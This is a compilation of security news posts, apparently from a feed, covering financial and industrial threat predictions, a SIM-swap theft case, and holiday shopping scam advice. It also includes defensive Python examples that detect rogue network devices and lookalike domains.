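The transaction id and amount are part of the authenticated body for a reason: a tag over the decision alone would still let a device replay an earlier genuine "APPROVED" against a new withdrawal. In production the key lives in the terminal's hardware security module, not in application memory, and transport-layer encryption between terminal and host removes the cleartext the attackers relied on in the first place.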

The post ATM attackers strike again: Are you at risk? appeared first on Help Net Security.

Securelist: Threat predictions for industrial security in 2019

The past few years have been very intense and eventful when it comes to incidents affecting the information security of industrial systems. That includes new vulnerabilities, new threat vectors, accidental infections of industrial systems and detected targeted attacks. In response, last year we developed some Threat Predictions for Industrial Security in 2018, outlining the trends most likely to unfold in the year ahead.

The industrial cybersecurity threat landscape moves at a slower and more rigid pace than the information technology threat landscape in general. Attacks on ICS are still hard to monetize. Industrial organizations are still out of scope for the majority of cybercriminals. They are a relatively new target for the adversaries who have already started attacking them, and those adversaries are still applying existing tools and tactics to their attacks. That is why the majority of the industrial threat predictions from last year are still unfolding, although some of them have already come true.

Kaspersky Lab specialists have spent a few years investigating the cyberthreat landscape for industrial organizations and trying to bring their expertise and technology to OT environments. We are still on a long journey, with various difficulties to cope with and problems yet to solve. By constantly keeping in contact with many researchers in other security organizations and some ICS security pioneers from inside industrial companies, we have come to the conclusion that some of the difficulties we face are common to the industry. Solving some of those is mandatory to make the world more secure and safe.

So, although the fog of 2018’s predictions and threat landscape has yet to clear, we decided to focus on the major problems likely to affect the work of professionals involved in industrial systems in 2019.

Top four cybersecurity challenges facing industrial enterprises in 2019

The ever-increasing attack surface

The increasing number of automation systems, the variety of automation tools, the number of organizations and individuals with direct or remote access to automation systems, as well as the emergence of communication channels for monitoring and remote control between previously independent objects – all of these expand the opportunities for criminals to plan and execute their attacks.

Growing interest of cybercriminals and special services

A decrease in profitability and increase in risks from cyberattacks aimed at traditional victims is pushing criminals to search for new targets, including those within industrial organizations.

At the same time, special services in many countries, as well as other organized groups – motivated by internal and external political interests – and financially-motivated groups, are actively engaged in the research and development of techniques to implement espionage and terrorist attacks aimed at industrial enterprises.

Taking into account the current geopolitical context, the development of industrial enterprises’ automation systems, and the transition to new management processes and models of production and economic activity, this situation will continue to develop in the coming years, negatively affecting industrial organizations.

The underestimation of general threat levels

A lack of public access to information about information security issues within industrial enterprises, coupled with the relative rarity of targeted attacks on automation systems, an excessive belief in emergency protection systems and the denial of objective reality is having a negative effect on the assessment of threat levels by owners and operators of industrial enterprises and their personnel.

The misunderstanding of threat specifics and the suboptimal choice of protection options

In the world of industrial cybersecurity, several high-profile incidents, carried out with the help of targeted attacks against a very limited number of victims, created an information landscape that fully shaped the idea of a potential threat – both among information security researchers and security developers, and among potential users of these tools.

However, the professional reporting of these incidents was often too difficult for the majority of potential users to understand, and was devoid of important OT details. The information field formed in these conditions, including the absence of a daily need to deflect attacks aimed at automated control systems, gave developers a chance to create products that might protect better against the artificial scenarios thought up by researchers themselves than against real-world day-to-day threats. This could leave the automation systems of industrial enterprises vulnerable to real-life attacks, including random ones and targeted attack campaigns organized by cybercriminals.

The full version of the threat predictions will be published on the ICS CERT website.

Full report “Kaspersky Security Bulletin: Threat predictions for industrial security in 2019” (English, PDF)


Securelist: Cyberthreats to financial institutions 2019: overview and predictions

Introduction – key events in 2018

The past year has been extremely eventful in terms of the digital threats faced by financial institutions: cybercrime groups have used new infiltration techniques, and the geography of attacks has become more extensive.

Despite this, let’s start the review with a positive trend: in 2018 police arrested a number of well-known cybercrime group members responsible for Carbanak/Cobalt and Fin7, among others. These groups have been involved in attacks on dozens, if not hundreds, of companies and financial institutions around the world. Unfortunately, the arrest of group members, including the leader of Carbanak, did not lead to a complete halt in activities – in fact, it seemingly started the process of splitting the groups into smaller cells.

The most active actor of 2018 was Lazarus. This group is gradually expanding its arsenal of tools and looking for new targets. The area of interest today includes banks, fin-tech companies, crypto-exchanges, PoS terminals, ATMs, and in terms of geography, we have recorded infection attempts in dozens of countries, most of which are located in Asia, Africa and Latin America.

At the end of last year, we noted that young fin-tech companies and crypto-exchanges are at a higher risk, due to the immaturity of their security systems. This type of company was targeted most often. The most creative attack seen in 2018, from our point of view, was AppleJeus, which targeted cryptocurrency traders. In this case, criminals created special software that looked legitimate and carried out legitimate functions. However, the program also fetched a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain.

Continuing the topic of supply chain attacks, it is worth mentioning the MageCart group, which, by infecting website payment pages (including those of large companies such as British Airways) was able to access a huge amount of payment card data this year. This attack was even more effective because the criminals chose an interesting target – Magento, which is one of the most popular platforms for online stores. Using vulnerabilities in Magento, criminals were able to infect dozens of sites in a technique that is likely to be used by several other groups.

We should also note the development of ATM malware families. In 2018, Kaspersky Lab specialists discovered six new families, meaning that there are now more than 20 of this kind. Some ATM malware families have also evolved: for example, the Plotus malware from Latin America has been updated to a new version, Peralda, and has gained new functionality as a result. The greatest damage associated with attacks on ATMs was caused by infections from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs.

2018 also saw attacks on organizations that use banking systems. Firstly, our machine learning-based behavioral analysis system detected several waves of malicious activity related to the spread of the Buhtrap banking Trojan this year, as attackers embedded their code in popular news sites and forums. Secondly, we detected attacks on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. Often in the final stages of attacks like this, attackers install remote administration tools on infected computers such as RMS, TeamViewer, and VNC.

Before giving our forecasts for 2019, let’s see how accurate our forecasts for 2018 turned out to be…

  • Attacks made through the underlying blockchain technologies of financial systems implemented by the financial institutions themselves – this did not happen in the financial field, but was seen in the online casino sector.
  • More supply chain attacks in the financial world – yes
  • Attacks on mass media (in general, including Twitter accounts, Facebook pages, Telegram channels and more) including hacks and manipulation for getting financial profit through stock/crypto exchange trade – yes
  • ATM malware automation – yes. For example, there are malicious programs that immediately give money to attackers.
  • More attacks on crypto exchange platforms – yes
  • A spike in traditional card fraud due to the huge data breaches that happened in the previous year – no
  • More nation-state sponsored attacks against financial organizations – yes
  • The inclusion of fin-techs and mobile-only users in attacks: a fall in the number of traditional PC-oriented internet banking Trojans, with novice mobile banking users becoming the new prime target for criminals – yes. In particular, some banking Trojans stopped attacking users of online banking on PCs, while the number of Trojans attacking users of mobile devices has more than doubled over the past year.

Predictions for 2019

  • The emergence of new groups due to the fragmentation of Cobalt/Carbanak and Fin7: new groups and new geography

The arrest of leaders and separate members of major cybercrime groups has not stopped these groups from attacking financial institutions. Next year, we will most likely see the fragmentation of these groups and the creation of new ones by former members, which will lead to the intensification of attacks and the expansion of the geography of potential victims.

At the same time, local groups will expand their activities, increasing quality and scale. It is reasonable to assume that some members of the regional groups may contact former members of the Fin7 or Cobalt group to facilitate access to regional targets and gain new tools with which they can carry out attacks.

  • The first attacks through the theft and use of biometric data

Biometric systems for user identification and authentication are being gradually implemented by various financial institutions, and several major leaks of biometric data have already occurred. These two facts lay the foundation for the first POC (proof-of-concept) attacks on financial services using leaked biometric data.

  • The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, South-East Asia and Central Europe

The activity of cybercriminals in these regions is constantly growing: the immaturity of protective solutions in the financial sector and the rapid spread of various electronic means of payment among the population and companies in these regions are contributing to this. Now, all the prerequisites exist for the emergence of a new center for financial threats in Asia, in addition to the three already in Latin America, the Korean peninsula and the ex-USSR.

  • Continuation of the supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world

This trend will remain with us in 2019. Attacks on software providers have proven effective and allowed attackers to gain access to several major targets. Small companies (that supply specialized financial services for the larger players) will be jeopardized first, such as the suppliers of money transfer systems, banks and exchanges.

  • Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of PoS attacks with attacks on systems accepting online payments

Next year, in terms of threats to ordinary users and stores, those who use cards without chips and do not use two-factor authorization of transactions will be the most at risk. The malicious community has focused on some simple goals that are easy to monetize. However, this does not mean that they do not use any complex techniques. For example, to bypass anti-fraud systems, they copy all computer and browser system settings. On the other hand, this cybercriminal behavior will mean that the number of attacks on PoS terminals will decrease, and they will move towards attacks on online payment platforms instead.

  • The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network

Due to the lack of physical security and the lack of control over connected devices in many networks, cybercriminals will more actively exploit situations where a computer or mini-board can be installed, specifically configured to steal data from the network and transfer the information using 4G/LTE modems.

Attacks like this will provide cybergangs with an opportunity to access various data, including information about the customers of financial institutions, as well as the network infrastructure of financial institutions.
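A board hidden behind a desk that exfiltrates over its own LTE modem never crosses the perimeter firewall, but it still has to ask the local DHCP server for an address, which is where a defender can see it. The script below is an added example, not code from the Securelist report: it parses ISC dhcpd DHCPACK syslog lines and reports leases for hardware that is not in the asset inventory, or that reuses a registered MAC under a different hostname. The log lines, MAC addresses, hostnames and inventory are constructed sample data.

```python
# Added example, not code from the Securelist report. Compares ISC dhcpd
# DHCPACK syslog lines against an asset inventory and reports leases for
# hardware nobody registered. Log lines, MAC addresses and hostnames are
# constructed sample data.
import re

DHCPACK_RE = re.compile(
    r"DHCPACK on (?P<ip>\d+\.\d+\.\d+\.\d+) to (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: \((?P<host>[^)]*)\))? via (?P<iface>\S+)",
    re.IGNORECASE,
)


def parse_dhcpack(lines):
    """Yield {ip, mac, host, iface} for each DHCPACK line; host is None when the
    client sent no hostname. MACs are normalised to lower case so that an
    inventory lookup does not depend on how the server logged them."""
    for line in lines:
        m = DHCPACK_RE.search(line)
        if m:
            lease = m.groupdict()
            lease["mac"] = lease["mac"].lower()
            yield lease


def find_unknown_devices(lines, inventory):
    """inventory maps MAC -> registered hostname.
    Returns (ip, mac, observed_hostname, reason) for every lease that is either
    an unregistered MAC or a registered MAC presenting a different hostname
    (cloning a known address is the obvious way for a rogue box to blend in)."""
    alerts = []
    for lease in parse_dhcpack(lines):
        registered = inventory.get(lease["mac"])
        if registered is None:
            alerts.append((lease["ip"], lease["mac"], lease["host"], "MAC not in inventory"))
        elif lease["host"] and lease["host"] != registered:
            alerts.append((lease["ip"], lease["mac"], lease["host"],
                           f"hostname differs from inventory ({registered})"))
    return alerts


# Constructed asset inventory for one branch segment.
INVENTORY = {
    "00:1b:21:aa:bb:01": "branch07-teller1",
    "00:1b:21:aa:bb:02": "branch07-teller2",
    "00:1b:21:aa:bb:10": "branch07-printer",
}

# Constructed dhcpd syslog excerpt (ISC dhcpd DHCPACK line format).
SAMPLE_LOG = [
    "Dec  3 09:12:41 dhcp1 dhcpd[2311]: DHCPACK on 10.20.5.14 to 00:1b:21:aa:bb:01 (branch07-teller1) via eth1",
    "Dec  3 09:13:02 dhcp1 dhcpd[2311]: DHCPACK on 10.20.5.15 to 00:1B:21:AA:BB:02 (branch07-teller2) via eth1",
    "Dec  3 09:41:55 dhcp1 dhcpd[2311]: DHCPACK on 10.20.5.77 to b8:27:eb:12:34:56 (raspberrypi) via eth1",
    "Dec  3 09:42:10 dhcp1 dhcpd[2311]: DHCPACK on 10.20.5.78 to 00:1b:21:aa:bb:02 (office-laptop) via eth1",
    "Dec  3 09:43:31 dhcp1 dhcpd[2311]: DHCPACK on 10.20.5.79 to 3c:5a:b4:00:00:01 via eth1",
    "Dec  3 09:44:00 dhcp1 dhcpd[2311]: DHCPREQUEST for 10.20.5.14 from 00:1b:21:aa:bb:01 via eth1",
]

if __name__ == "__main__":
    for alert in find_unknown_devices(SAMPLE_LOG, INVENTORY):
        print(*alert)
```

On the sample it flags the unregistered single-board computer, the unregistered device that sent no hostname at all, and the registered teller MAC that suddenly calls itself a laptop. DHCP is only the cheapest signal; a device with a static address never appears here, so the same inventory check belongs on switch MAC tables and 802.1X authentication logs, and the real fix the report points at is port security and physical control of wall ports.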

  • Attacks on mobile banking for business users

Mobile applications for business are gaining popularity, which is likely to lead to the first attacks on their users. There are enough tools for this, and the possible losses that businesses incur are much higher than the losses incurred when individuals are attacked. The most likely attack vectors are attacks at the Web API level and through the supply chain.

  • Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wires: result of data leaks

Social engineering is particularly popular in some regions, for example Latin America. Cybercriminals keep targeting specific people in companies and financial institutions to make them wire big sums of money. Due to the high number of data leaks in previous years, this type of attack is becoming more effective, since criminals are able to use leaked internal information about the targeted organization to make their messages look absolutely legitimate. The main idea remains the same: they make these targets believe that the financial request has come from business partners or directors. These techniques use zero malware, but demonstrate how targeted social engineering gets results, and they will become more powerful in 2019. This includes attacks like “simswap”.

“Cyberthreats to financial institutions 2019: overview and predictions” (PDF)



Securelist

Cyberthreats to financial institutions 2019: overview and predictions

Introduction – key events in 2018

The past year has been extremely eventful in terms of the digital threats faced by financial institutions: cybercrime groups have used new infiltration techniques, and the geography of attacks has become more extensive.

Despite this, let’s start the review with a positive trend: in 2018 police arrested a number of well-known cybercrime group members responsible for Carbanak/Cobalt and Fin7, among others. These groups have been involved in attacks on dozens, if not hundreds of companies and financial institutions around the world. Unfortunately, the arrest of group members including the leader of Carbanak, did not lead to a complete halt in activities – in fact, it seemingly started the process of splitting the groups into smaller cells.

The most active actor of 2018 was Lazarus. This group is gradually expanding its arsenal of tools and looking for new targets. The area of interest today includes banks, fin-tech companies, crypto-exchanges, PoS terminals, ATMs, and in terms of geography, we have recorded infection attempts in dozens of countries, most of which are located in Asia, Africa and Latin America.

At the end of last year, we noted that young fin-tech companies and crypto-exchanges are at a higher risk, due to the immaturity of their security systems. This certain type of companies was targeted most often. The most creative attack seen in 2018, from our point of view, was AppleJeus, which targeted cryptocurrency traders. In this case, criminals created special software that looked legitimate and carried out legitimate functions. However, the program also uploaded a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain.

Continuing the topic of supply chain attacks, it is worth mentioning the MageCart group, which, by infecting website payment pages (including those of large companies such as British Airways) was able to access a huge amount of payment card data this year. This attack was even more effective because the criminals chose an interesting target – Magento, which is one of the most popular platforms for online stores. Using vulnerabilities in Magento, criminals were able to infect dozens of sites in a technique that is likely to be used by several other groups.

We should also note the development of ATM malware families. In 2018, Kaspersky Lab specialists discovered six new families, meaning that there are now more than 20 of this kind. Some ATM malware families have also evolved: for example, the Plotus malware from Latin America has been updated to a new version, Peralda, and has gained new functionality as a result. The greatest damage associated with attacks on ATMs was caused by infections from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs.

2018 also saw attacks on organizations that use banking systems. Firstly, our machine learning-based behavioral analysis system detected several waves of malicious activity related to the spread of the Buhtrap banking Trojan this year, as attackers embedded their code in popular news sites and forums. Secondly, we detected attacks on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. Often in the final stages of attacks like this, attackers install remote administration tools on infected computers such as RMS, TeamViewer, and VNC.

Before giving our forecasts for 2019, let’s see how accurate our forecasts for 2018 turned out to be…

  • Attacks made through the underlying blockchain technologies of financial systems implemented by the financial institutions themselves – this did not happen in the financial field, but was seen in the online casino sector.
  • More supply chain attacks in the financial world – yes
  • Attacks on mass media (in general, including Twitter accounts, Facebook pages, telegram channels and more) including hacks and manipulation for getting financial profit through stock/crypto exchange trade – yes
  • ATM malware automation – yes. For example, there are malicious programs that immediately give money to attackers.
  • More attacks on crypto exchange platforms – yes
  • A spike in traditional card fraud due to the huge data breaches that happened in the previous year – no
  • More nation-state sponsored attacks against financial organizations – yes
  • The inclusion of fin-techs and mobile-only users in attacks: a fall in the number of traditional PC-oriented internet banking Trojans, with novice mobile banking users becoming the new prime target for criminals – yes. In particular, some banking Trojans stopped attacking users of online banking on PCs, while the number of Trojans attacking users of mobile devices has more than doubled over the past year.

Predictions for 2019

  • The emergence of new groups due to the fragmentation of Cobalt/Carbanak and Fin7: new groups and new geography

The arrest of leaders and separate members of major cybercrime groups has not stopped these groups from attacking financial institutions. Next year, we will most likely see the fragmentation of these groups and the creation of new ones by former members, which will lead to the intensification of attacks and the expansion of the geography of potential victims.

At the same time, local groups will expand their activities, increasing quality and scale. It is reasonable to assume that some members of the regional groups may contact former members of the Fin7 or Cobalt groups to facilitate access to regional targets and gain new tools with which they can carry out attacks.

  • The first attacks through the theft and use of biometric data

Biometric systems for user identification and authentication are being gradually implemented by various financial institutions, and several major leaks of biometric data have already occurred. These two facts lay the foundation for the first POC (proof-of-concept) attacks on financial services using leaked biometric data.

  • The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, South-East Asia and Central Europe

The activity of cybercriminals in these regions is constantly growing: the immaturity of protective solutions in the financial sector and the rapid spread of various electronic means of payment among the population and companies in these regions are contributing to this. Now, all the prerequisites exist for the emergence of a new center for financial threats in Asia, in addition to the three that already exist in Latin America, the Korean peninsula and the former USSR.

  • Continuation of the supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world

This trend will remain with us in 2019. Attacks on software providers have proven effective and allowed attackers to gain access to several major targets. Small companies (that supply specialized financial services for the larger players) will be jeopardized first, such as the suppliers of money transfer systems, banks and exchanges.

  • Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of PoS attacks with attacks on systems accepting online payments

Next year, in terms of threats to ordinary users and stores, those who use cards without chips and do not use two-factor authorization of transactions will be the most at risk. The malicious community has focused on some simple goals that are easy to monetize. However, this does not mean that they do not use any complex techniques. For example, to bypass anti-fraud systems, they copy all computer and browser system settings. On the other hand, this cybercriminal behavior will mean that the number of attacks on PoS terminals will decrease, and they will move towards attacks on online payment platforms instead.

  • The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network

Due to the lack of physical security and the lack of control over connected devices in many networks, cybercriminals will more actively exploit situations where a computer or mini-board can be installed, specifically configured to steal data from the network and transfer the information using 4G/LTE modems.

Attacks like this will provide cybergangs with an opportunity to access various data, including information about the customers of financial institutions, as well as the network infrastructure of financial institutions.

  • Attacks on mobile banking for business users

Mobile applications for business are gaining popularity, which is likely to lead to the first attacks on their users. There are enough tools for this, and the possible losses that businesses incur are much higher than the losses incurred when individuals are attacked. The most likely attack vectors are attacks at the Web API level and through the supply chain.

  • Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wires: result of data leaks

Social engineering is particularly popular in some regions, for example Latin America. Cybercriminals keep targeting specific people in companies and financial institutions to make them wire big sums of money. Due to the high number of data leaks in previous years, this type of attack is becoming more effective, since criminals are able to use leaked internal information about the targeted organization to make their messages look absolutely legitimate. The main idea remains the same: they make these targets believe that the financial request has come from business partners or directors. These techniques use zero malware, but demonstrate how targeted social engineering gets results, and they will become more powerful in 2019. This includes attacks like “simswap”.

 “Cyberthreats to financial institutions 2019: overview and predictions” (PDF)

Security Affairs: Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-year-old man from New York, has stolen $1 million from a Silicon Valley executive via SIM swap, and targeted other individuals.

Nicholas Truglia, a 21-year-old man from New York, has been accused of stealing $1 million from a Silicon Valley executive via SIM swap. He gained access to the executive's phone number and used it to impersonate him and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court. “

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft, although his attempts to rob other targets ultimately failed.

Police raided Truglia's house under a warrant and were able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time of writing, there is no news about the remaining amount of money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

A SIM swap fraud is a type of fraud that circumvents the additional security measures introduced by banks to protect customer transactions. Basically, cyber criminals are able to transfer cash from a victim’s account by intercepting one-time PIN codes and SMS notifications.

The attacker impersonates the victim and asks the mobile provider’s tech support staff to reassign the victim’s phone number to a SIM card owned by the crook. The procedure requires the attacker to answer a few security questions meant to verify the victim’s identity. Typically the attacker gathers the information needed to answer the questions through social engineering or OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.



McAfee Blogs: 8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.



Beware Black Friday & Cyber Monday shoppers: fake products, credit cards scams and other types of fraud

Group-IB security experts are warning about the increasing scammers’ activity during the Black Friday and Cyber Monday Sales

Group-IB, an international company that specializes in preventing cyber attacks, warns about the increasing scammers’ activity during the Black Friday and Cyber Monday Sales. Group-IB experts have discovered more than 400 website-clones of the popular marketplace AliExpress and roughly 200 fake websites of famous brands and online stores. These websites aim to sell counterfeit products, steal money or credit cards information.

Black Friday counterfeit goods

Fake leather bags, sunglasses, sportswear, electronics and perfumes pose risks to consumers. Long Beach press conference. Photo by Brad Graverson 11-28-14

AliExpress and its 400 clones

The Black Friday Sale is a favorite time of the year not only for bargain hunters chasing the best deals, but also for online scammers chasing a quick buck. They create website-clones of famous brands and online stores long before Black Friday starts. For instance, Group-IB discovered around 400 bogus AliExpress websites that appear to be legitimate. To attract customers, fraudsters create fake websites that look almost identical to the legitimate ones: they copy branding, logo, fonts and even register a similar domain name to mislead visitors. Most of the analyzed fraudulent websites used variations of the legitimate AliExpress URL. The damage to one customer can reach up to hundreds of dollars. Such fake websites are capable of luring up to 200 000 monthly visitors.

Just one group of scammers is capable of creating hundreds of bogus websites. Shortly before the Black Friday Sale, the Group-IB Brand Protection team detected a network of 198 fake websites that illegally used famous brands’ trademarks. Most of the domain names were purchased in August 2018, and all the content (photos, product descriptions, and prices) was copied from the legitimate websites. It is worth noting that all these fake websites had the same hosting provider, ISPIRIA Networks Ltd, located in Belize (Central America). Scammers create fake websites to advertise and sell counterfeit goods, such as computers and electronics, clothing, jewelry, accessories, beauty and personal care products and even medicine, usually with discounts that reach 80%. Sometimes fraudsters advertise and sell non-existent products. For example, one of the fake websites offers «Red Dead Redemption 2» for PC, while the most anticipated game of 2018 was only released for PlayStation 4 and Xbox One.

Phishing: 1274 attacks a day

Another type of fraud that poses a serious threat to customers is phishing websites that are looking to steal money or personal information (login credentials or credit card details). According to Group-IB Brand Protection experts, 1274 phishing attacks are carried out daily. In total, the average monthly revenue of phishing websites designed to closely resemble legitimate brands’ trademarks amounts to 45,600 USD.

Fraudsters use legitimate promotion channels to increase their website traffic: mass mailing via messengers, banner ads, SEO and paid social media campaigns. Fraudsters quite often buy domain names that mimic legitimate brands’ website addresses and then redirect users to different webpages. If you click on such a link, you end up on a completely different website.

“The consequences of such fraud can be both direct financial losses and collateral, such as damage to the reputation. According to statistics, 64% of users stop buying a company’s products after one negative experience. In the cybersecurity framework, the websites-clones should be considered not only as a threat to the customers, but also to the company. Detecting fraudulent websites should be a systemic activity for big brands,” comments Andrey Busargin, Director of Brand Protection and Anti-Piracy at Group-IB.

How to avoid online scammers: protect your brand & secure your wallet

Group-IB’s experts offer some basic “cyber hygiene” reminders for avoiding becoming a cybercriminal’s victim:

For brands:

  1. Purchase all similar domain names so that cybercriminals cannot use your trademark in a fake website’s domain name. For example, if your address is internet-shop.ru, cybercriminals can register domain names such as internet.shop.ru or internet shop.ru and act on behalf of your brand.
  2. Monitor references to your brand in domain name and phishing website databases regularly. Companies that provide brand protection and anti-fraud services on the Internet have access to these databases.
  3. Search for the criminals who use your brand in search engines. Send search requests from different geolocations and devices in order to get the most objective results.
  4. Keep track of the promotion techniques of fraudulent resources: contextual ads, posts in social networks and messengers.
  5. Uncover the network of fraudulent websites that use your brand. Cybercriminals usually create several website clones. They can be detected using website affiliation technologies that automatically detect the links between fraudulent resources.
  6. Monitor mobile apps in both official and unofficial stores, including the forums, search engines, social networks and websites where they are distributed.
  7. Constantly monitor the use of your brand and company management names in social media.
  8. Block fraudulent resources that cause reputational and financial damage to your brand. Seek out the experts.

For customers:

  1. First, always pay attention to the URL in the browser.
  2. If the website name contains a few dots, for example (*con.su.club), it is better not to order anything from such a website. Check the official site via web search.
  3. Check the date when the website was created. To do this, use free WHOIS services, where you can find the registration date and information on the owner of the domain (fraudulent websites are newly created, usually days before the big sales).
  4. Do not trust malfunctioning websites; an official website should work correctly even at peak load.
  5. Do not purchase from unauthorized resellers.
  6. Do not click on the links in articles dedicated to discounts.
  7. Have a separate payment card for online shopping and do not type your card data into suspicious websites. At the end of the day, it is better not to buy a product than to lose all the money from your bank card.
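The brand-side tips above (separator-swapped domain names, networks of website clones) and the customer-side tips (count the dots, check the WHOIS creation date) reduce to checks that can be automated. The script below is an added Python example and is not Group-IB's tooling: the protected brand names, the candidate domains, their WHOIS creation dates and the reference date are all constructed, and the registrable-label logic assumes a one-label public suffix, which a real tool would replace with a public suffix list lookup.

```python
"""Triage of lookalike domains for brand protection.

Added Python example, not Group-IB's tooling. The protected brands, candidate
domains, WHOIS creation dates and reference date are all constructed.
"""
from datetime import date, timedelta
from typing import NamedTuple, Optional

PROTECTED_BRANDS = ("aliexpress", "internet-shop")   # hypothetical brands to protect
NEW_DOMAIN_DAYS = 60    # constructed threshold: younger domains are suspect
MAX_LABELS = 3          # more labels than this ("a few dots") is suspect


class Candidate(NamedTuple):
    domain: str
    created: Optional[date]   # None when WHOIS returned no creation date


def squash(text: str) -> str:
    """Drop separators so internet.shop.ru and internet-shop.ru compare equal."""
    return "".join(ch for ch in text.lower() if ch not in "-._")


def labels_of(domain: str) -> list:
    return domain.lower().strip(".").split(".")


def registrable_label(domain: str) -> str:
    """Label just left of the TLD. Assumes a one-label public suffix; a real tool
    would consult the public suffix list (co.uk, com.br, ...)."""
    labels = labels_of(domain)
    return labels[-2] if len(labels) >= 2 else labels[0]


def brand_abuse(domain: str, brands=PROTECTED_BRANDS) -> Optional[str]:
    """Return the brand when it occurs in the domain but is not the registrable label."""
    flat = squash(domain)
    for brand in brands:
        if squash(brand) in flat and registrable_label(domain) != brand:
            return brand
    return None


def triage(candidate: Candidate, today: date) -> list:
    """Reasons the domain deserves a closer look; an empty list means nothing obvious."""
    reasons = []
    brand = brand_abuse(candidate.domain)
    if brand:
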